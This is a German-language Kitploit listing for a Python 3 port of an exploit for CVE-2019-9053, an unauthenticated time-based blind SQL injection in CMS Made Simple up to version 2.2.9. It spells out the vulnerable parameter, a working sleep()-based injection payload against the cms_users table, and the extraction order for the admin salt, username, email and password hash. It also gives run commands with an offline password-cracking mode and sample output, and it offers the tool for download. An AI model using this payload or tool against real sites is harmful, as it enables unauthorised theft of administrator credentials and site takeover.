Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2019-9053-py3 — Nicht authentifizierter zeitbasierter Blind-SQL-Injection-Exploit für CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), auf Python 3 portiert. | Kitploit
Tools/GitHubGitHub/vedantrana73/cve-2019-9053-py3
Passwort-CrackingSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubvedantrana73/cve-2019-9053-py3

cve-2019-9053-py3

Nicht authentifizierter zeitbasierter Blind-SQL-Injection-Exploit für CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), auf Python 3 portiert.

Repository anzeigen
3vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-9053 — CMS Made Simple SQLi-Exploit (Python 3)

Python CVE Type Target License

Haftungsausschluss: Dieses Tool ist ausschließlich für autorisierte Penetrationstests und Bildungszwecke gedacht. Der Einsatz gegen Systeme ohne ausdrückliche schriftliche Genehmigung ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.


Übersicht

Dies ist ein Python-3-Port des öffentlichen Exploits für CVE-2019-9053 — eine nicht authentifizierte zeitbasierte Blind-SQL-Injection-Schwachstelle in CMS Made Simple ≤ 2.2.9.

Der verwundbare Parameter ist m1_idlist auf dem Endpunkt /moduleinterface.php (News-Modul). Die Benutzereingabe wird unbereinigt in eine SQL-Abfrage übernommen, wodurch ein nicht authentifizierter Angreifer das Admin-Salt, den Benutzernamen, die E-Mail-Adresse und den Passwort-Hash extrahieren kann — und optional das Passwort offline knacken kann.

Ursprünglicher Exploit von Daniele Scanu @ Certimeter Group.
Python-3-Port mit Korrekturen und Bereinigung.


Funktionsweise

Der Exploit nutzt ein Timing-Orakel — er injiziert SELECT sleep(T) in eine SQL-LIKE-Bedingung und misst die HTTP-Antwortzeit. Wenn der Server ≥ T Sekunden verzögert, war die injizierte Bedingung wahr. Dadurch können Daten Zeichen für Zeichen extrahiert werden, ohne dass jemals Daten im HTTP-Antworttext erscheinen.

root@kitploit:~
Payload-Struktur:
  m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_users
            +where+password+like+0x{hex(bekanntes_präfix+vermutung)}25
            +and+user_id+like+0x31)+--+

Extraktionsreihenfolge:

Nach der Extraktion berechnet der optionale Offline-Wörterbuchangriff MD5(salt + wort) gegen eine Wortliste — keine weiteren Netzwerkanfragen erforderlich.


Python-3-Änderungen

Das ursprüngliche Skript wurde für Python 2 geschrieben. Die folgenden problematischen Änderungen wurden behoben:


Anforderungen

root@kitploit:~
pip3 install requests termcolor
AbhängigkeitZweck
requestsHTTP-Anfragen an das Zielsystem
termcolorFarbige Terminal-Ausgabe

Verwendung

root@kitploit:~
# Grundlegende Extraktion (ohne Passwort-Knacken)
python3 exploit.py -u http://<ziel-ip>/simple

# Extraktion + Offline-Passwort-Knacken
python3 exploit.py -u http://<ziel-ip>/simple --crack -w /usr/share/wordlists/rockyou.txt

Optionen

FlagBeschreibung
-u, --url

Beispielausgabe

root@kitploit:~
[+] Salt for password found: 1234abcd
[+] Username found: admin
[+] Email found: [email protected]
[+] Password found: a1b2c3d4e5f6...
[+] Password cracked: password123

CVE-Details


Referenzen

  • NVD — CVE-2019-9053
  • Original-Exploit — Exploit-DB #46635
  • CMS Made Simple

Rechtliches

Dieser Exploit wird ausschließlich für autorisierte Penetrationstests und CTF-/Bildungszwecke bereitgestellt.
Die unbefugte Verwendung gegen Systeme, die du nicht besitzt oder für die du keine ausdrückliche schriftliche Testgenehmigung hast, ist eine Straftat gemäß dem IT Act, 2000 (Indien) und entsprechenden Gesetzen weltweit.

Tool herunterladen
SchrittFeldTabelleHinweise
1Saltcms_siteprefsErforderlich, um das Passwort zu knacken
2Benutzernamecms_usersuser_id = 1 (Admin)
3E-Mailcms_usersuser_id = 1 (Admin)
4Passwortcms_usersGespeichert als MD5(salt + passwort)
#ÄnderungGrund
1print "..." → print("...")print ist in Python 3 eine Funktion
2hashlib.md5(str(salt) + line) → hashlib.md5((salt + line).encode())hashlib.md5() erfordert in Python 3 bytes
3dict = open(wordlist) → with open(wordlist) as wordlist_filedict überdeckt ein eingebautes Objekt; Umstellung auf Kontextmanager
4print "\033c" → print("\033c", end="")Vermeidet doppelten Zeilenumbruch beim Terminal-Clear
5print colored(...) → print(colored(...))colored() gibt einen String zurück; benötigt print()-Wrapper
Basis-URL der CMS-Made-Simple-Installation
-w, --wordlistPfad zu einer Wortliste für das Offline-Passwort-Knacken
-c, --crackModus zum Passwort-Knacken aktivieren
FeldWert
CVE-IDCVE-2019-9053
CVSS-Score7.5 (Hoch)
TypNicht authentifizierte zeitbasierte Blind-SQL-Injection
BetroffenCMS Made Simple ≤ 2.2.9
Parameterm1_idlist im News-Modul
AuthentifizierungKeine
PatchCMS Made Simple 2.2.10+